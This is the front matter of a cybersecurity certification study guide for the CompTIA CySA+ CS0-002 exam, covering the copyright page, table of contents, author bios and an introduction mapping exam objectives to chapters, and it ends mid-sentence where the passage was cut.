About This eBook
ePUB is an open, industry-standard format for eBooks.
However, support of ePUB and its many features varies across
reading devices and applications. Use your device or app
settings to customize the presentation to your liking. Settings
that you can customize often include font, font size, single or
double column, landscape or portrait mode, and figures that
you can click or tap to enlarge. For additional information about
the settings and features on your reading device or app, visit the
device manufacturer’s Web site.
Many titles include programming code or configuration
examples. To optimize the presentation of these elements, view
the eBook in single-column, landscape mode and adjust the font
size to the smallest setting. In addition to presenting code and
configurations in the reflowable text format, we have included
images of the code that mimic the presentation found in the
print book; therefore, where the reflowable format may
compromise the presentation of the code listing, you will see a
“Click here to view code image” link. Click the link to view the
print-fidelity code image. To return to the previous page viewed,
click the Back button on your device or app.
CompTIA Cybersecurity
Analyst (CySA+) CS0-002
Cert Guide
Troy McMillan
CompTIA Cybersecurity Analyst (CySA+) CS0-002 Cert
Guide
Copyright © 2021 by Pearson Education, Inc.
Hoboken, New Jersey
All rights reserved. No part of this book shall be reproduced,
stored in a retrieval system, or transmitted by any means,
electronic, mechanical, photocopying, recording, or otherwise,
without written permission from the publisher. No patent
liability is assumed with respect to the use of the information
contained herein. Although every precaution has been taken in
the preparation of this book, the publisher and author assume
no responsibility for errors or omissions. Nor is any liability
assumed for damages resulting from the use of the information
contained herein.
ISBN-13: 978-0-13-674716-1
ISBN-10: 0-13-674716-7
Library of Congress Control Number: 2020941742
Trademarks
All terms mentioned in this book that are known to be
trademarks or service marks have been appropriately
capitalized. Pearson IT Certification cannot attest to the
accuracy of this information. Use of a term in this book should
not be regarded as affecting the validity of any trademark or
service mark.
Warning and Disclaimer
Every effort has been made to make this book as complete and
as accurate as possible, but no warranty or fitness is implied.
The information provided is on an “as is” basis. The author and
the publisher shall have neither liability nor responsibility to
any person or entity with respect to any loss or damages arising
from the information contained in this book.
Special Sales
For information about buying this title in bulk quantities, or for
special sales opportunities (which may include electronic
versions; custom cover designs; and content particular to your
business, training goals, marketing focus, or branding
interests), please contact our corporate sales department at
corpsales@pearsoned.com or (800) 382-3419.
For government sales inquiries, please contact
governmentsales@pearsoned.com.
For questions about sales outside the U.S., please contact
intlcs@pearson.com.
Editor-in-Chief
Mark Taub
Product Line Manager
Brett Bartow
Executive Editor
Nancy Davis
Development Editor
Christopher Cleveland
Managing Editor
Sandra Schroeder
Senior Project Editor
Tonya Simpson
Copy Editor
Bill McManus
Indexer
Erika Millen
Proofreader
Abigail Manheim
Technical Editor
Chris Crayton
Editorial Assistant
Cindy Teeters
Cover Designer
Chuti Prasertsith
Compositor
codeMantra
Contents at a Glance
Introduction
CHAPTER 1 The Importance of Threat Data and Intelligence
CHAPTER 2 Utilizing Threat Intelligence to Support
Organizational Security
CHAPTER 3 Vulnerability Management Activities
CHAPTER 4 Analyzing Assessment Output
CHAPTER 5 Threats and Vulnerabilities Associated with
Specialized Technology
CHAPTER 6 Threats and Vulnerabilities Associated with
Operating in the Cloud
CHAPTER 7 Implementing Controls to Mitigate Attacks and
Software Vulnerabilities
CHAPTER 8 Security Solutions for Infrastructure
Management
CHAPTER 9 Software Assurance Best Practices
CHAPTER 10 Hardware Assurance Best Practices
CHAPTER 11 Analyzing Data as Part of Security Monitoring
Activities
CHAPTER 12 Implementing Configuration Changes to
Existing Controls to Improve Security
CHAPTER 13 The Importance of Proactive Threat Hunting
CHAPTER 14 Automation Concepts and Technologies
CHAPTER 15 The Incident Response Process
CHAPTER 16 Applying the Appropriate Incident Response
Procedure
CHAPTER 17 Analyzing Potential Indicators of Compromise
CHAPTER 18 Utilizing Basic Digital Forensics Techniques
CHAPTER 19 The Importance of Data Privacy and Protection
CHAPTER 20 Applying Security Concepts in Support of
Organizational Risk Mitigation
CHAPTER 21 The Importance of Frameworks, Policies,
Procedures, and Controls
CHAPTER 22 Final Preparation
APPENDIX A Answers to the “Do I Know This Already?”
Quizzes and Review Questions
APPENDIX B CompTIA Cybersecurity Analyst (CySA+) CS0-002 Cert Guide Exam Updates
Glossary of Key Terms
Index
Online Elements:
APPENDIX C Memory Tables
APPENDIX D Memory Tables Answer Key
APPENDIX E Study Planner
Glossary of Key Terms
Table of Contents
Introduction
Chapter 1 The Importance of Threat Data and
Intelligence
“Do I Know This Already?” Quiz
Foundation Topics
Intelligence Sources
Open-Source Intelligence
Proprietary/Closed-Source Intelligence
Timeliness
Relevancy
Confidence Levels
Accuracy
Indicator Management
Structured Threat Information eXpression
(STIX)
Trusted Automated eXchange of Indicator
Information (TAXII)
OpenIOC
Threat Classification
Known Threat vs. Unknown Threat
Zero-day
Advanced Persistent Threat
Threat Actors
Nation-state
Organized Crime
Terrorist Groups
Hacktivist
Insider Threat
Intentional
Unintentional
Intelligence Cycle
Commodity Malware
Information Sharing and Analysis Communities
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 2 Utilizing Threat Intelligence to Support
Organizational Security
“Do I Know This Already?” Quiz
Foundation Topics
Attack Frameworks
MITRE ATT&CK
The Diamond Model of Intrusion Analysis
Kill Chain
Threat Research
Reputational
Behavioral
Indicator of Compromise (IoC)
Common Vulnerability Scoring System (CVSS)
Threat Modeling Methodologies
Adversary Capability
Total Attack Surface
Attack Vector
Impact
Probability
Threat Intelligence Sharing with Supported
Functions
Incident Response
Vulnerability Management
Risk Management
Security Engineering
Detection and Monitoring
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 3 Vulnerability Management Activities
“Do I Know This Already?” Quiz
Foundation Topics
Vulnerability Identification
Asset Criticality
Active vs. Passive Scanning
Mapping/Enumeration
Validation
Remediation/Mitigation
Configuration Baseline
Patching
Hardening
Compensating Controls
Risk Acceptance
Verification of Mitigation
Scanning Parameters and Criteria
Risks Associated with Scanning Activities
Vulnerability Feed
Scope
Credentialed vs. Non-credentialed
Server-based vs. Agent-based
Internal vs. External
Special Considerations
Types of Data
Technical Constraints
Workflow
Sensitivity Levels
Regulatory Requirements
Segmentation
Intrusion Prevention System (IPS), Intrusion
Detection System (IDS), and Firewall Settings
Firewall
Inhibitors to Remediation
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 4 Analyzing Assessment Output
“Do I Know This Already?” Quiz
Foundation Topics
Web Application Scanner
Burp Suite
OWASP Zed Attack Proxy (ZAP)
Nikto
Arachni
Infrastructure Vulnerability Scanner
Nessus
OpenVAS
Software Assessment Tools and Techniques
Static Analysis
Dynamic Analysis
Reverse Engineering
Fuzzing
Enumeration
Nmap
Host Scanning
hping
Active vs. Passive
Responder
Wireless Assessment Tools
Aircrack-ng
Reaver
oclHashcat
Cloud Infrastructure Assessment Tools
ScoutSuite
Prowler
Pacu
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 5 Threats and Vulnerabilities Associated with
Specialized Technology
“Do I Know This Already?” Quiz
Foundation Topics
Mobile
Unsigned Apps/System Apps
Security Implications/Privacy Concerns
Data Storage
Nonremovable Storage
Removable Storage
Transfer/Back Up Data to Uncontrolled Storage
USB OTG
Device Loss/Theft
Rooting/Jailbreaking
Push Notification Services
Geotagging
OEM/Carrier Android Fragmentation
Mobile Payment
NFC Enabled
Inductance Enabled
Mobile Wallet
Peripheral-Enabled Payments (Credit Card
Reader)
USB
Malware
Unauthorized Domain Bridging
SMS/MMS/Messaging
Internet of Things (IoT)
IoT Examples
Methods of Securing IoT Devices
Embedded Systems
Real-Time Operating System (RTOS)
System-on-Chip (SoC)
Field Programmable Gate Array (FPGA)
Physical Access Control
Systems
Devices
Facilities
Building Automation Systems
IP Video
HVAC Controllers
Sensors
Vehicles and Drones
CAN Bus
Drones
Workflow and Process Automation Systems
Industrial Control System (ICS)
Supervisory Control and Data Acquisition (SCADA)
Modbus
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 6 Threats and Vulnerabilities Associated with
Operating in the Cloud
“Do I Know This Already?” Quiz
Foundation Topics
Cloud Deployment Models
Cloud Service Models
Function as a Service (FaaS)/Serverless Architecture
Infrastructure as Code (IaC)
Insecure Application Programming Interface (API)
Improper Key Management
Key Escrow
Key Stretching
Unprotected Storage
Transfer/Back Up Data to Uncontrolled Storage
Big Data
Logging and Monitoring
Insufficient Logging and Monitoring
Inability to Access
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 7 Implementing Controls to Mitigate Attacks
and Software Vulnerabilities
“Do I Know This Already?” Quiz
Foundation Topics
Attack Types
Extensible Markup Language (XML) Attack
Structured Query Language (SQL) Injection
Overflow Attacks
Buffer
Integer Overflow
Heap
Remote Code Execution
Directory Traversal
Privilege Escalation
Password Spraying
Credential Stuffing
Impersonation
Man-in-the-Middle Attack
VLAN-based Attacks
Session Hijacking
Rootkit
Cross-Site Scripting
Reflected
Persistent
Document Object Model (DOM)
Vulnerabilities
Improper Error Handling
Dereferencing
Insecure Object Reference
Race Condition
Broken Authentication
Sensitive Data Exposure
Insecure Components
Code Reuse
Insufficient Logging and Monitoring
Weak or Default Configurations
Use of Insecure Functions
strcpy
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 8 Security Solutions for Infrastructure
Management
“Do I Know This Already?” Quiz
Foundation Topics
Cloud vs. On-premises
Cloud Mitigations
Asset Management
Asset Tagging
Device-Tracking Technologies
Geolocation/GPS Location
Object-Tracking and Object-Containment
Technologies
Geotagging/Geofencing
RFID
Segmentation
Physical
LAN
Intranet
Extranet
DMZ
Virtual
Jumpbox
System Isolation
Air Gap
Network Architecture
Physical
Firewall Architecture
Software-Defined Networking
Virtual SAN
Virtual Private Cloud (VPC)
Virtual Private Network (VPN)
IPsec
SSL/TLS
Serverless
Change Management
Virtualization
Security Advantages and Disadvantages of
Virtualization
Type 1 vs. Type 2 Hypervisors
Virtualization Attacks and Vulnerabilities
Virtual Networks
Management Interface
Vulnerabilities Associated with a Single Physical
Server Hosting Multiple Companies’ Virtual
Machines
Vulnerabilities Associated with a Single Platform
Hosting Multiple Companies’ Virtual Machines
Virtual Desktop Infrastructure (VDI)
Terminal Services/Application Delivery Services
Containerization
Identity and Access Management
Identify Resources
Identify Users
Identify Relationships Between Resources and
Users
Privilege Management
Multifactor Authentication (MFA)
Authentication
Authentication Factors
Knowledge Factors
Ownership Factors
Characteristic Factors
Single Sign-On (SSO)
Kerberos
Active Directory
SESAME
Federation
XACML
SPML
SAML
OpenID
Shibboleth
Role-Based Access Control
Attribute-Based Access Control
Mandatory Access Control
Manual Review
Cloud Access Security Broker (CASB)
Honeypot
Monitoring and Logging
Log Management
Audit Reduction Tools
NIST SP 800-137
Encryption
Cryptographic Types
Symmetric Algorithms
Asymmetric Algorithms
Hybrid Encryption
Hashing Functions
One-way Hash
Message Digest Algorithm
Secure Hash Algorithm
Transport Encryption
SSL/TLS
HTTP/HTTPS/SHTTP
SSH
IPsec
Certificate Management
Certificate Authority and Registration Authority
Certificates
Certificate Revocation List
OCSP
PKI Steps
Cross-Certification
Digital Signatures
Active Defense
Hunt Teaming
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 9 Software Assurance Best Practices
“Do I Know This Already?” Quiz
Foundation Topics
Platforms
Mobile
Containerization
Configuration Profiles and Payloads
Personally Owned, Corporate Enabled
Corporate-Owned, Personally Enabled
Application Wrapping
Application, Content, and Data Management
Remote Wiping
SCEP
NIST SP 800-163 Rev 1
Web Application
Maintenance Hooks
Time-of-Check/Time-of-Use Attacks
Cross-Site Request Forgery (CSRF)
Click-Jacking
Client/Server
Embedded
Hardware/Embedded Device Analysis
System-on-Chip (SoC)
Secure Booting
Central Security Breach Response
Firmware
Software Development Life Cycle (SDLC) Integration
Step 1: Plan/Initiate Project
Step 2: Gather Requirements
Step 3: Design
Step 4: Develop
Step 5: Test/Validate
Step 6: Release/Maintain
Step 7: Certify/Accredit
Step 8: Change Management and Configuration
Management/Replacement
DevSecOps
DevOps
Software Assessment Methods
User Acceptance Testing
Stress Test Application
Security Regression Testing
Code Review
Security Testing
Code Review Process
Secure Coding Best Practices
Input Validation
Output Encoding
Session Management
Authentication
Context-based Authentication
Network Authentication Methods
IEEE 802.1X
Biometric Considerations
Certificate-Based Authentication
Data Protection
Parameterized Queries
Static Analysis Tools
Dynamic Analysis Tools
Formal Methods for Verification of Critical Software
Service-Oriented Architecture
Security Assertion Markup Language (SAML)
Simple Object Access Protocol (SOAP)
Representational State Transfer (REST)
Microservices
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 10 Hardware Assurance Best Practices
“Do I Know This Already?” Quiz
Foundation Topics
Hardware Root of Trust
Trusted Platform Module (TPM)
Virtual TPM
Hardware Security Module (HSM)
MicroSD HSM
eFuse
Unified Extensible Firmware Interface (UEFI)
Trusted Foundry
Secure Processing
Trusted Execution
Secure Enclave
Processor Security Extensions
Atomic Execution
Anti-Tamper
Self-Encrypting Drives
Trusted Firmware Updates
Measured Boot and Attestation
Measured Launch
Integrity Measurement Architecture
Bus Encryption
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 11 Analyzing Data as Part of Security
Monitoring Activities
“Do I Know This Already?” Quiz
Foundation Topics
Heuristics
Trend Analysis
Endpoint
Malware
Virus
Worm
Trojan Horse
Logic Bomb
Spyware/Adware
Botnet
Rootkit
Ransomware
Reverse Engineering
Memory
Memory Protection
Secured Memory
Runtime Data Integrity Check
Memory Dumping, Runtime Debugging
System and Application Behavior
Known-good Behavior
Anomalous Behavior
Exploit Techniques
File System
File Integrity Monitoring
User and Entity Behavior Analytics (UEBA)
Network
Uniform Resource Locator (URL) and Domain
Name System (DNS) Analysis
DNS Analysis
Domain Generation Algorithm
Flow Analysis
NetFlow Analysis
Packet and Protocol Analysis
Packet Analysis
Protocol Analysis
Malware
Log Review
Event Logs
Syslog
Kiwi Syslog Server
Firewall Logs
Windows Defender
Cisco
Check Point
Web Application Firewall (WAF)
Proxy
Intrusion Detection System (IDS)/Intrusion
Prevention System (IPS)
Sourcefire
Snort
Zeek
HIPS
Impact Analysis
Organization Impact vs. Localized Impact
Immediate Impact vs. Total Impact
Security Information and Event Management (SIEM)
Review
Rule Writing
Known-Bad Internet Protocol (IP)
Dashboard
Query Writing
String Search
Script
Piping
E-mail Analysis
E-mail Spoofing
Malicious Payload
DomainKeys Identified Mail (DKIM)
Sender Policy Framework (SPF)
Domain-based Message Authentication,
Reporting, and Conformance (DMARC)
Phishing
Spear Phishing
Whaling
Forwarding
Digital Signature
E-mail Signature Block
Embedded Links
Impersonation
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 12 Implementing Configuration Changes to
Existing Controls to Improve Security
“Do I Know This Already?” Quiz
Foundation Topics
Permissions
Whitelisting and Blacklisting
Application Whitelisting and Blacklisting
Input Validation
Firewall
NextGen Firewalls
Host-Based Firewalls
Intrusion Prevention System (IPS) Rules
Data Loss Prevention (DLP)
Endpoint Detection and Response (EDR)
Network Access Control (NAC)
Quarantine/Remediation
Agent-Based vs. Agentless NAC
802.1X
Sinkholing
Malware Signatures
Development/Rule Writing
Sandboxing
Port Security
Limiting MAC Addresses
Implementing Sticky MAC
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 13 The Importance of Proactive Threat
Hunting
“Do I Know This Already?” Quiz
Foundation Topics
Establishing a Hypothesis
Profiling Threat Actors and Activities
Threat Hunting Tactics
Hunt Teaming
Threat Model
Executable Process Analysis
Memory Consumption
Reducing the Attack Surface Area
System Hardening
Configuration Lockdown
Bundling Critical Assets
Commercial Business Classifications
Military and Government Classifications
Distribution of Critical Assets
Attack Vectors
Integrated Intelligence
Improving Detection Capabilities
Continuous Improvement
Continuous Monitoring
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 14 Automation Concepts and Technologies
“Do I Know This Already?” Quiz
Foundation Topics
Workflow Orchestration
Scripting
Application Programming Interface (API) Integration
Automated Malware Signature Creation
Data Enrichment
Threat Feed Combination
Machine Learning
Use of Automation Protocols and Standards
Security Content Automation Protocol (SCAP)
Continuous Integration
Continuous Deployment/Delivery
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 15 The Incident Response Process
“Do I Know This Already?” Quiz
Foundation Topics
Communication Plan
Limiting Communication to Trusted Parties
Disclosing Based on Regulatory/Legislative
Requirements
Preventing Inadvertent Release of Information
Using a Secure Method of Communication
Reporting Requirements
Response Coordination with Relevant Entities
Legal
Human Resources
Public Relations
Internal and External
Law Enforcement
Senior Leadership
Regulatory Bodies
Factors Contributing to Data Criticality
Personally Identifiable Information (PII)
Personal Health Information (PHI)
Sensitive Personal Information (SPI)
High Value Assets
Financial Information
Intellectual Property
Patent
Trade Secret
Trademark
Copyright
Securing Intellectual Property
Corporate Information
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 16 Applying the Appropriate Incident
Response Procedure
“Do I Know This Already?” Quiz
Foundation Topics
Preparation
Training
Testing
Documentation of Procedures
Detection and Analysis
Characteristics Contributing to Severity Level
Classification
Downtime and Recovery Time
Data Integrity
Economic
System Process Criticality
Reverse Engineering
Data Correlation
Containment
Segmentation
Isolation
Eradication and Recovery
Vulnerability Mitigation
Sanitization
Reconstruction/Reimaging
Secure Disposal
Patching
Restoration of Permissions
Reconstitution of Resources
Restoration of Capabilities and Services
Verification of Logging/Communication to
Security Monitoring
Post-Incident Activities
Evidence Retention
Lessons Learned Report
Change Control Process
Incident Response Plan Update
Incident Summary Report
Indicator of Compromise (IoC) Generation
Monitoring
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 17 Analyzing Potential Indicators of
Compromise
“Do I Know This Already?” Quiz
Foundation Topics
Network-Related Indicators of Compromise
Bandwidth Consumption
Beaconing
Irregular Peer-to-Peer Communication
Rogue Device on the Network
Scan/Sweep
Unusual Traffic Spike
Common Protocol over Non-standard Port
Host-Related Indicators of Compromise
Processor Consumption
Memory Consumption
Drive Capacity Consumption
Unauthorized Software
Malicious Process
Unauthorized Change
Unauthorized Privilege
Data Exfiltration
Abnormal OS Process Behavior
File System Change or Anomaly
Registry Change or Anomaly
Unauthorized Scheduled Task
Application-Related Indicators of Compromise
Anomalous Activity
Introduction of New Accounts
Unexpected Output
Unexpected Outbound Communication
Service Interruption
Application Log
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 18 Utilizing Basic Digital Forensics
Techniques
“Do I Know This Already?” Quiz
Foundation Topics
Network
Wireshark
tcpdump
Endpoint
Disk
FTK
Helix3
Password Cracking
Imaging
Memory
Mobile
Cloud
Virtualization
Legal Hold
Procedures
EnCase Forensic
Sysinternals
Forensic Investigation Suite
Hashing
Hashing Utilities
Changes to Binaries
Carving
Data Acquisition
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 19 The Importance of Data Privacy and
Protection
“Do I Know This Already?” Quiz
Foundation Topics
Privacy vs. Security
Non-technical Controls
Classification
Ownership
Retention
Data Types
Personally Identifiable Information (PII)
Personal Health Information (PHI)
Payment Card Information
Retention Standards
Confidentiality
Legal Requirements
Data Sovereignty
Data Minimization
Purpose Limitation
Non-disclosure agreement (NDA)
Technical Controls
Encryption
Data Loss Prevention (DLP)
Data Masking
Deidentification
Tokenization
Digital Rights Management (DRM)
Document DRM
Music DRM
Movie DRM
Video Game DRM
E-Book DRM
Watermarking
Geographic Access Requirements
Access Controls
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 20 Applying Security Concepts in Support of
Organizational Risk Mitigation
“Do I Know This Already?” Quiz
Foundation Topics
Business Impact Analysis
Identify Critical Processes and Resources
Identify Outage Impacts and Estimate Downtime
Identify Resource Requirements
Identify Recovery Priorities
Recoverability
Fault Tolerance
Risk Identification Process
Make Risk Determination Based upon Known
Metrics
Qualitative Risk Analysis
Quantitative Risk Analysis
Risk Calculation
Probability
Magnitude
Communication of Risk Factors
Risk Prioritization
Security Controls
Engineering Tradeoffs
MOUs
SLAs
Organizational Governance
Business Process Interruption
Degrading Functionality
Systems Assessment
ISO/IEC 27001
ISO/IEC 27002
Documented Compensating Controls
Training and Exercises
Red Team
Blue Team
White Team
Tabletop Exercise
Supply Chain Assessment
Vendor Due Diligence
OEM Documentation
Hardware Source Authenticity
Trusted Foundry
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 21 The Importance of Frameworks, Policies,
Procedures, and Controls
“Do I Know This Already?” Quiz
Foundation Topics
Frameworks
Risk-Based Frameworks
National Institute of Standards and Technology
(NIST)
COBIT
The Open Group Architecture Framework
(TOGAF)
Prescriptive Frameworks
NIST Cybersecurity Framework Version 1.1
ISO 27000 Series
SABSA
ITIL
Maturity Models
ISO/IEC 27001
Policies and Procedures
Code of Conduct/Ethics
Acceptable Use Policy (AUP)
Password Policy
Data Ownership
Data Retention
Account Management
Continuous Monitoring
Work Product Retention
Category
Managerial
Operational
Technical
Control Type
Preventative
Detective
Corrective
Deterrent
Directive
Physical
Audits and Assessments
Regulatory
Compliance
Exam Preparation Tasks
Review All Key Topics
Define Key Terms
Review Questions
Chapter 22 Final Preparation
Exam Information
Getting Ready
Tools for Final Preparation
Pearson Test Prep Practice Test Software and
Questions on the Website
Memory Tables
Chapter-Ending Review Tools
Suggested Plan for Final Review/Study
Summary
Appendix A Answers to the “Do I Know This Already?”
Quizzes and Review Questions
Appendix B CompTIA Cybersecurity Analyst (CySA+)
CS0-002 Cert Guide Exam Updates
Glossary of Key Terms
Index
Online Elements:
Appendix C Memory Tables
Appendix D Memory Tables Answer Key
Appendix E Study Planner
Glossary of Key Terms
About the Author
Troy McMillan is a product developer and technical editor for
Kaplan IT as well as a full-time trainer. He became a
professional trainer 20 years ago, teaching Cisco, Microsoft,
CompTIA, and wireless classes. He has written or contributed to
more than a dozen projects, including the following recent ones:
Contributing subject matter expert for CCNA Cisco Certified
Network Associate Certification Exam Preparation Guide (Kaplan)
Author of CISSP Cert Guide (Pearson)
Prep test question writer for CCNA Wireless 640-722 Official Cert
Guide (Cisco Press)
Author of CompTIA Advanced Security Practitioner (CASP) Cert
Guide (Pearson)
Troy has also appeared in the following training videos for
OnCourse Learning: Security+; Network+; Microsoft 70-410,
411, and 412 exam prep; ICND1; and ICND2.
He delivers CISSP training classes for CyberVista, and is an
authorized online training provider for (ISC)2.
Troy also creates certification practice tests and study guides for
CyberVista. He lives in Asheville, North Carolina, with his wife,
Heike.
Dedication
I dedicate this book to my wife, Heike, who has supported me
when I needed it most.
Acknowledgments
I must thank everyone on the Pearson team for all of their help
in making this book better than it would otherwise have been.
That includes Chris Cleveland, Nancy Davis, Chris Crayton,
Tonya Simpson, and Mudita Sonar.
About the Technical Reviewer
Chris Crayton (MCSE) is an author, technical consultant, and
trainer. He has worked as a computer technology and
networking instructor, information security director, network
administrator, network engineer, and PC specialist. Chris has
authored several print and online books on PC repair, CompTIA
A+, CompTIA Security+, and Microsoft Windows. He has also
served as technical editor and content contributor on numerous
technical titles for several of the leading publishing companies.
He holds numerous industry certifications, has been recognized
with many professional teaching awards, and has served as a
state-level SkillsUSA competition judge.
We Want to Hear from You!
As the reader of this book, you are our most important critic
and commentator. We value your opinion and want to know
what we’re doing right, what we could do better, what areas
you’d like to see us publish in, and any other words of wisdom
you’re willing to pass our way.
We welcome your comments. You can email to let us know what
you did or didn’t like about this book—as well as what we can do
to make our books better.
Please note that we cannot help you with technical problems
related to the topic of this book.
When you write, please be sure to include this book’s title and
author as well as your name and email address. We will
carefully review your comments and share them with the author
and editors who worked on the book.
Email:
community@informit.com
Reader Services
Register your copy of CompTIA Cybersecurity Analyst (CySA+)
CS0-002 Cert Guide at www.pearsonitcertification.com for
convenient access to downloads, updates, and corrections as
they become available. To start the registration process, go to
www.pearsonitcertification.com/register and log in or create an
account*. Enter the product ISBN 9780136747161 and click
Submit. When the process is complete, you will find any
available bonus content under Registered Products.
*Be sure to check the box that you would like to hear from us to
receive exclusive discounts on future editions of this product.
Introduction
CompTIA CySA+ bridges the skills gap between CompTIA
Security+ and CompTIA Advanced Security Practitioner
(CASP+). Building on CySA+, IT professionals can pursue
CASP+ to prove their mastery of the hands-on cybersecurity
skills required at the 5- to 10-year experience level. Earn the
CySA+ certification to grow your career within the CompTIA
recommended cybersecurity career pathway.
CompTIA CySA+ certification is designed to be a “vendor-neutral” exam that measures your knowledge of industry-standard technology.
GOALS AND METHODS
The number-one goal of this book is a simple one: to help you
pass the 2020 version of the CompTIA CySA+ certification
exam, CS0-002.
Because the CompTIA CySA+ certification exam stresses
problem-solving abilities and reasoning more than
memorization of terms and facts, this book is designed to help
you master and understand the required objectives for each
exam.
To aid you in mastering and understanding the CySA+
certification objectives, this book uses the following methods:
The beginning of each chapter identifies the CompTIA CySA+
objective addressed in the chapter and defines the related topics
covered in the chapter.
The body of the chapter explains the topics from a hands-on and
theory-based standpoint. This includes in-depth descriptions,
tables, and figures that are geared toward building your knowledge
so that you can pass the exam. The structure of each chapter
generally follows the outline of the corresponding exam objective,
which not only enables you to study the exam objectives
methodically but also enables you to easily locate coverage of
specific exam objectives that you think you need to review further.
Key Topic icons identify important figures, tables, and lists of
information that you should know for the exam. Key topics are
interspersed throughout the chapter and are listed in a table at the
end of the chapter.
Key terms in each chapter are emphasized in bold italic and are
listed without definitions at the end of each chapter. Write down the
definition of each term and check your work against the complete
key terms in the glossary.
WHO SHOULD READ THIS BOOK?
The CompTIA CySA+ exam is designed for IT security analysts,
vulnerability analysts, and threat intelligence analysts. The
exam certifies that a successful candidate has the knowledge
and skills required to leverage intelligence and threat detection
techniques, analyze and interpret data, identify and address
vulnerabilities, suggest preventative measures, and effectively
respond to and recover from incidents.
The recommended experience for taking the CompTIA CySA+
exam includes Network+, Security+, or equivalent knowledge as
well as a minimum of four years of hands-on information
security or related experience.
This book is for you if you are attempting to attain a position in
the cybersecurity field. It is also for you if you want to keep your
skills sharp or perhaps retain your job due to a company policy
that mandates that you update security skills.
This book is also for you if you want to acquire additional
certifications beyond Network+ or Security+. The book is
designed to offer easy transition to future certification studies.
STRATEGIES FOR EXAM PREPARATION
Strategies for exam preparation vary depending on your existing
skills, knowledge, and equipment available. Of course, the ideal
exam preparation would consist of three or four years of hands-on security or related experience followed by rigorous study of
the exam objectives.
Before and after you have read through the book, have a look at
the current exam objectives for the CompTIA CySA+
Certification Exam, listed at
https://www.comptia.org/certifications/cybersecurity-analyst#examdetails. If there are any areas shown in the
certification exam outline that you would still like to study, find
those sections in the book and review them.
When you feel confident in your skills, attempt the practice
exams found on the website that accompanies this book. As you
work through the practice exams, note the areas where you lack
confidence and review those concepts or configurations in the
book. After you have reviewed those areas, work through the
practice exams a second time and rate your skills. Keep in mind
that the more you work through the practice exams, the more
familiar the questions will become.
After you have worked through the practice exams a second
time and feel confident in your skills, schedule the CompTIA
CySA+ CS0-002 exam through Pearson VUE
(https://home.pearsonvue.com). To prevent the information
from evaporating out of your mind, you should typically take
the exam within a week of when you consider yourself ready to
take it.
The CompTIA CySA+ certification credential for those passing
the certification exams is now valid for three years. To renew
your certification without retaking the exam, you need to
participate in continuing education (CE) activities and pay an
annual maintenance fee of $50 (that is, $150 for three years).
See https://www.comptia.org/continuing-education/learn/ce-program-fees for fee details. To learn more about the
certification renewal policy, see
https://certification.comptia.org/continuing-education.
HOW THE BOOK IS ORGANIZED
Table I-1 outlines where each of the CySA+ exam objectives is
covered in the book. For a full dissection of what is covered in
each objective, you should download the most recent set of
objectives from
https://www.comptia.org/certifications/cybersecurity-analyst#examdetails.
Table I-1 CySA+ CS0-002 Exam Objectives: Coverage by Chapter

Domain 1.0 Threat and Vulnerability Management (accounts for 22% of the exam)
1.1 Explain the importance of threat data and intelligence (Chapter 1)
1.2 Given a scenario, utilize threat intelligence to support organizational security (Chapter 2)
1.3 Given a scenario, perform vulnerability management activities (Chapter 3)
1.4 Given a scenario, analyze the output from common vulnerability assessment tools (Chapter 4)
1.5 Explain the threats and vulnerabilities associated with specialized technology (Chapter 5)
1.6 Explain the threats and vulnerabilities associated with operating in the cloud (Chapter 6)
1.7 Given a scenario, implement controls to mitigate attacks and software vulnerabilities (Chapter 7)

Domain 2.0 Software and Systems Security (accounts for 18% of the exam)
2.1 Given a scenario, apply security solutions for infrastructure management (Chapter 8)
2.2 Explain software assurance best practices (Chapter 9)
2.3 Explain hardware assurance best practices (Chapter 10)

Domain 3.0 Security Operations and Monitoring (accounts for 25% of the exam)
3.1 Given a scenario, analyze data as part of security monitoring activities (Chapter 11)
3.2 Given a scenario, implement configuration changes to existing controls to improve security (Chapter 12)
3.3 Explain the importance of proactive threat hunting (Chapter 13)
3.4 Compare and contrast automation concepts and technologies (Chapter 14)

Domain 4.0 Incident Response (accounts for 22% of the exam)
4.1 Explain the importance of the incident response process (Chapter 15)
4.2 Given a scenario, apply the appropriate incident response procedure (Chapter 16)
4.3 Given an incident, analyze potential indicators of compromise (Chapter 17)
4.4 Given a scenario, utilize basic digital forensics techniques (Chapter 18)

Domain 5.0 Compliance and Assessment (accounts for 13% of the exam)
5.1 Understand the importance of data privacy and protection (Chapter 19)
5.2 Given a scenario, apply security concepts in support of organizational risk mitigation (Chapter 20)
5.3 Explain the importance of frameworks, policies, procedures, and controls (Chapter 21)
BOOK FEATURES
To help you customize your study time using this book, the core
chapters have several features that help you make the best use
of your time:
Foundation Topics: These are the core sections of each chapter.
They explain the concepts for the topics in that chapter.
Exam Preparation Tasks: After the “Foundation Topics” section
of each chapter, the “Exam Preparation Tasks” section provides the
following study activities that you should do to prepare for the
exam:
Review All Key Topics: As previously mentioned, the Key
Topic icon appears next to the most important items in the
“Foundation Topics” section of the chapter. The Review All Key
Topics activity lists the key topics from the chapter, along with
their page numbers. Although the contents of the entire chapter
could be on the exam, you should definitely know the
